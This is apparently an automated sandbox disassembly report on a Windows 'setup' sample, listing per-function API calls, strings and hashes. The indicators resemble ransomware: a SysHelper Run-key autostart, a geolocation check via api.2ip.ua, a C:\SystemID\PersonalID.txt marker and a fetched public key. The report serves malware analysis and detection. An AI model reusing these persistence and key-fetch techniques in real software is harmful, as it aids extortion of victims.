                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                • API String ID: 1843630811-800396732
                • Opcode ID: 2bd020c1e17fcfa228c11dbca22ff63456fe2e49c9dc0fa1113d110a18decb3d
                • Instruction ID: dcf8a581e05b5da13000ef7a953c2c15a8b95d2250363c4482f8ef8be3b44f4c
                • Opcode Fuzzy Hash: 2bd020c1e17fcfa228c11dbca22ff63456fe2e49c9dc0fa1113d110a18decb3d
                • Instruction Fuzzy Hash: BF32C070108380EFE730DF25C845B9BBBE4AF85308F10491EF99957291D7BA9589CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1583 412220-41228a call 42f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1586 4122bd-4122d1 K32EnumProcesses 1583->1586 1587 41228c-4122ba LoadLibraryW GetProcAddress * 3 1583->1587 1588 4122d3-4122de 1586->1588 1589 4122df-4122ec 1586->1589 1587->1586 1590 412353-41235b 1589->1590 1591 4122ee 1589->1591 1592 4122f0-412308 OpenProcess 1591->1592 1593 412346-412351 CloseHandle 1592->1593 1594 41230a-41231a K32EnumProcessModules 1592->1594 1593->1590 1593->1592 1594->1593 1595 41231c-412339 K32GetModuleBaseNameW call 420235 1594->1595 1597 41233e-412343 1595->1597 1597->1593 1598 412345 1597->1598 1598->1593
                APIs
                • GetCommandLineW.KERNEL32 ref: 00412235
                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                • CloseHandle.KERNEL32(00000000), ref: 00412347
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                • API String ID: 3668891214-3807497772
                • Opcode ID: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                • Opcode Fuzzy Hash: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                APIs
                • timeGetTime.WINMM ref: 0041F15E
                • Sleep.KERNEL32(?), ref: 0041F185
                • Sleep.KERNEL32(?), ref: 0041F19D
                • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0
                  • Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
                  • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                  • Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                  • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
                  • Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                • String ID: C:\
                • API String ID: 3672571082-3404278061
                • Opcode ID: 39b8f45e59f2c3965938975f64671c7092b516ee561892a48603513266843507
                • Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
                • Opcode Fuzzy Hash: 39b8f45e59f2c3965938975f64671c7092b516ee561892a48603513266843507
                • Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2199 41bae0-41bb0d 2200 41bba0-41bba7 2199->2200 2201 41bb13 2199->2201 2202 41bf3d-41bf47 2200->2202 2203 41bbad-41bbae 2200->2203 2204 41bb15-41bb1a 2201->2204 2205 41bb54-41bb5e 2201->2205 2212 41bf49 2202->2212 2213 41bf5c-41bf63 2202->2213 2208 41bbb0-41bbd4 DefWindowProcW 2203->2208 2209 41bbd7-41bc45 call 420c62 GetComputerNameW call 413100 call 41ce80 2203->2209 2210 41bb47-41bb4f PostQuitMessage 2204->2210 2211 41bb1c-41bb1f 2204->2211 2206 41bf81-41bf97 2205->2206 2207 41bb64-41bb68 2205->2207 2215 41bb75-41bb9d DefWindowProcW 2207->2215 2216 41bb6a-41bb6e 2207->2216 2233 41bc47-41bc4c 2209->2233 2234 41bc7b-41bc80 2209->2234 2210->2206 2211->2206 2220 41bb25-41bb28 2211->2220 2214 41bf50-41bf54 2212->2214 2217 41bf65-41bf71 IsWindow 2213->2217 2218 41bf9a-41bfc2 DefWindowProcW 2213->2218 2214->2218 2221 41bf56-41bf5a 2214->2221 2216->2207 2222 41bb70 2216->2222 2217->2206 2223 41bf73-41bf7b DestroyWindow 2217->2223 2220->2208 2225 41bb2e-41bb31 2220->2225 2221->2213 2221->2214 2222->2206 2223->2206 2225->2206 2227 41bb37-41bb42 call 411cd0 2225->2227 2227->2217 2235 41bc5a-41bc76 call 4145a0 2233->2235 2236 41bc4e-41bc57 call 422587 2233->2236 2237 41bc82-41bc8b call 422587 2234->2237 2238 41bc8e-41bcb1 2234->2238 2235->2234 2236->2235 2237->2238 2242 41bcb3-41bcbc call 422587 2238->2242 2243 41bcbf-41bcf1 call 420bed 2238->2243 2242->2243 2250 41bcf7-41bcfa 2243->2250 2251 41befb-41bf0f IsWindow 2243->2251 2252 41bd00-41bd04 2250->2252 2253 41bf11-41bf18 2251->2253 2254 41bf28-41bf2d 2251->2254 2255 41bee5-41bef1 2252->2255 2256 41bd0a-41bd0e 2252->2256 2253->2254 2257 41bf1a-41bf22 DestroyWindow 2253->2257 2254->2206 2258 41bf2f-41bf3b call 422587 2254->2258 2255->2252 2260 41bef7-41bef9 2255->2260 2256->2255 2259 41bd14-41bd7b call 414690 * 2 call 40eff0 2256->2259 2257->2254 2258->2206 2269 41bee1 2259->2269 2270 41bd81-41be44 call 41c330 call 419d10 call 41c240 call 41b680 call 41b8b0 call 414690 call 41ce80 call 4131d0 2259->2270 2260->2251 2260->2254 2269->2255 2287 41be55-41be81 2270->2287 2288 41be46-41be52 call 422587 2270->2288 2289 41be83-41be8c call 422587 2287->2289 2290 41be8f-41bedf CreateThread 2287->2290 2288->2287 2289->2290 2290->2255
                APIs
                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                • _malloc.LIBCMT ref: 0041BBE4
                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                • _free.LIBCMT ref: 0041BCD7
                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • IsWindow.USER32(?), ref: 0041BF69
                • DestroyWindow.USER32(?), ref: 0041BF7B
                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3873257347-0
                • Opcode ID: 1874270bcf3063fa96f8a36292056b13920b5ad84aac0d493e36469cd0cc3cbd
                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                • Opcode Fuzzy Hash: 1874270bcf3063fa96f8a36292056b13920b5ad84aac0d493e36469cd0cc3cbd
                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2295 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 2302 40cfb2-40cfb4 2295->2302 2303 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 2295->2303 2304 40d213-40d217 2302->2304 2308 40d000-40d01d 2303->2308 2306 40d224-40d236 2304->2306 2307 40d219-40d221 call 422587 2304->2307 2307->2306 2310 40d023-40d02c 2308->2310 2311 40d01f-40d021 2308->2311 2314 40d030-40d035 2310->2314 2313 40d039-40d069 call 4156d0 call 414300 2311->2313 2320 40d1cb 2313->2320 2321 40d06f-40d08b call 413010 2313->2321 2314->2314 2315 40d037 2314->2315 2315->2313 2323 40d1cd-40d1d1 2320->2323 2327 40d0b9-40d0bd 2321->2327 2328 40d08d-40d091 2321->2328 2325 40d1d3-40d1db call 422587 2323->2325 2326 40d1de-40d1f4 2323->2326 2325->2326 2330 40d201-40d20f 2326->2330 2331 40d1f6-40d1fe call 422587 2326->2331 2335 40d0cd-40d0e1 call 414300 2327->2335 2336 40d0bf-40d0ca call 422587 2327->2336 2332 40d093-40d09b call 422587 2328->2332 2333 40d09e-40d0b4 call 413d40 2328->2333 2330->2304 2331->2330 2332->2333 2333->2327 2335->2320 2346 40d0e7-40d149 call 413010 2335->2346 2336->2335 2349 40d150-40d15a 2346->2349 2350 40d160-40d162 2349->2350 2351 40d15c-40d15e 2349->2351 2353 40d165-40d16a 2350->2353 2352 40d16e-40d18b call 40b650 2351->2352 2357 40d19a-40d19e 2352->2357 2358 40d18d-40d18f 2352->2358 2353->2353 2354 40d16c 2353->2354 2354->2352 2357->2349 2360 40d1a0 2357->2360 2358->2357 2359 40d191-40d198 2358->2359 2359->2357 2361 40d1c7-40d1c9 2359->2361 2362 40d1a2-40d1a6 2360->2362 2361->2362 2363 40d1b3-40d1c5 2362->2363 2364 40d1a8-40d1b0 call 422587 2362->2364 2363->2323 2364->2363
                APIs
                • _memset.LIBCMT ref: 0040CF4A
                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                Strings
                • Microsoft Internet Explorer, xrefs: 0040CF5A
                • "country_code":", xrefs: 0040CFE1
                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead_memset
                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                • API String ID: 1485416377-2962370585
                • Opcode ID: 024b3a2441e03450481d723056a2cea3042cedec5767afe888cd0bf94bcd87ca
                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                • Opcode Fuzzy Hash: 024b3a2441e03450481d723056a2cea3042cedec5767afe888cd0bf94bcd87ca
                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2517 423576-42358f 2518 423591-42359b call 425208 call 4242d2 2517->2518 2519 4235a9-4235be call 42b420 2517->2519 2528 4235a0 2518->2528 2519->2518 2524 4235c0-4235c3 2519->2524 2526 4235d7-4235dd 2524->2526 2527 4235c5 2524->2527 2531 4235e9 call 42fb64 2526->2531 2532 4235df 2526->2532 2529 4235c7-4235c9 2527->2529 2530 4235cb-4235d5 call 425208 2527->2530 2533 4235a2-4235a8 2528->2533 2529->2526 2529->2530 2530->2528 2538 4235ee-4235fa call 42f803 2531->2538 2532->2530 2535 4235e1-4235e7 2532->2535 2535->2530 2535->2531 2541 423600-42360c call 42f82d 2538->2541 2542 4237e5-4237ef call 4242fd 2538->2542 2541->2542 2547 423612-42361e call 42f857 2541->2547 2547->2542 2550 423624-42362b 2547->2550 2551 42369b-4236a6 call 42f939 2550->2551 2552 42362d 2550->2552 2551->2533 2558 4236ac-4236af 2551->2558 2554 423637-423653 call 42f939 2552->2554 2555 42362f-423635 2552->2555 2554->2533 2562 423659-42365c 2554->2562 2555->2551 2555->2554 2560 4236b1-4236ba call 42fbb4 2558->2560 2561 4236de-4236eb 2558->2561 2560->2561 2572 4236bc-4236dc 2560->2572 2564 4236ed-4236fc call 4305a0 2561->2564 2565 423662-42366b call 42fbb4 2562->2565 2566 42379e-4237a0 2562->2566 2573 423709-423730 call 4304f0 call 4305a0 2564->2573 2574 4236fe-423706 2564->2574 2565->2566 2575 423671-423689 call 42f939 2565->2575 2566->2533 2572->2564 2583 423732-42373b 2573->2583 2584 42373e-423765 call 4304f0 call 4305a0 2573->2584 2574->2573 2575->2533 2580 42368f-423696 2575->2580 2580->2566 2583->2584 2589 423773-423782 call 4304f0 2584->2589 2590 423767-423770 2584->2590 2593 423784 2589->2593 2594 4237af-4237c8 2589->2594 2590->2589 2595 423786-423788 2593->2595 2596 42378a-423798 2593->2596 2597 4237ca-4237e3 2594->2597 2598 42379b 2594->2598 2595->2596 2599 4237a5-4237a7 2595->2599 2596->2598 2597->2566 2598->2566 2599->2566 2600 4237a9 2599->2600 2600->2594 2601 4237ab-4237ad 2600->2601 2601->2566 2601->2594
                APIs
                • _memset.LIBCMT ref: 004235B1
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __gmtime64_s.LIBCMT ref: 0042364A
                • __gmtime64_s.LIBCMT ref: 00423680
                • __gmtime64_s.LIBCMT ref: 0042369D
                • __allrem.LIBCMT ref: 004236F3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                • __allrem.LIBCMT ref: 00423726
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                • __allrem.LIBCMT ref: 0042375B
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                • String ID:
                • API String ID: 1503770280-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                APIs
                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                • _fgetws.LIBCMT ref: 0040C7BC
                • _memmove.LIBCMT ref: 0040C89F
                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2864494435-54166481
                • Opcode ID: 9dc020692cef374b1a029ecce09718c48db432c7c863de169bbf62cfcefd06b8
                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                • Opcode Fuzzy Hash: 9dc020692cef374b1a029ecce09718c48db432c7c863de169bbf62cfcefd06b8
                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                APIs
                • LoadLibraryW.KERNEL32(Shell32.dll,75AF4E90), ref: 0040F338
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: SHGetFolderPathW$Shell32.dll$\
                • API String ID: 2574300362-2555811374
                • Opcode ID: 84f5dca6d15e395a5318b2d8ebf354653e1335cc2aeafdcf3ea1fa7091428858
                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                • Opcode Fuzzy Hash: 84f5dca6d15e395a5318b2d8ebf354653e1335cc2aeafdcf3ea1fa7091428858
                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseValue$OpenQuery
                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                • API String ID: 3962714758-1667468722
                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                APIs
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                • String ID: bowsakkdestx.txt${"public_key":"
                • API String ID: 2805819797-1771568745
                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                APIs
                • timeGetTime.WINMM(?,?,?,?,0041EE2F), ref: 00411B1E
                • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B29
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                • DispatchMessageW.USER32(?), ref: 00411B5C
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                • Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
                • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B78
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: MessageTimetime$Peek$DispatchSleep
                • String ID:
                • API String ID: 3697694649-0
                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                APIs
                • __init_pointers.LIBCMT ref: 00425141
                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
